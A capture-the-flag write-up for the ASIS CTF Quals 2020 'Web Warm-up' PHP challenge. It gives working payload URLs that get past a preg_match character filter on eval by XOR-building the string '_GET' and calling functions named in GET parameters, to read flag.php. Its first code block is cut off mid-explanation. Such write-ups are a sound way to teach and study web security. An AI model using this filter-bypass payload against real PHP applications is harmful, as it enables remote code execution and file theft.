Tags: web waf-bypass php waf eval preg_match
Rating:
# ASIS CTF Quals 2020 – Web Warm-up
* **Category:** web
* **Points:** 33
## Challenge
> Warm up! Can you break all the tasks? I'll pray for you!
>
> read flag.php
>
> Link: http://69.90.132.196:5003/?view-source
## Solution
You have to read the `flag.php` file. Connecting to the URL you can see the following source code.
```php
/"; // This is: "_GET" string.
```
Then you can specify the execution of the content of a GET parameter with the following code.
```php
${$_}[_](); // This is $_GET[_]()
```
So the payload that will be executed by the `eval` instruction will be the following.
```php
$_="`{{{"^"?<>/";${$_}[_]();
```
Using a payload like the following, will let you to execute the `phpinfo` page.
```
http://69.90.132.196:5003/?warmup=$_=%22`{{{%22^%22?%3C%3E/%22;${$_}[_]();&_=phpinfo
```
The complete payload is the following.
```
http://69.90.132.196:5003/?warmup=$_=%22`{{{%22^%22?%3C%3E/%22;$_0=${$_}[_](${$_}[__]);${$_}[___]($_0);&_=file_get_contents&__=flag.php&___=var_dump
```
It can be composed step by step.
```php
$_="`{{{"^"?<>/"; // This is _GET string representation composed before.
$_0=${$_}[_](${$_}[__]); // This is $_0 = $_GET[_]($_GET[__]) and it is used to perform: file_get_contents("flag.php")
${$_}[___]($_0); // This is $_GET[___]($_0) and it is used to perform: var_dump($_0)
```
The result of the attack will be the following.
```
string(46) ""
```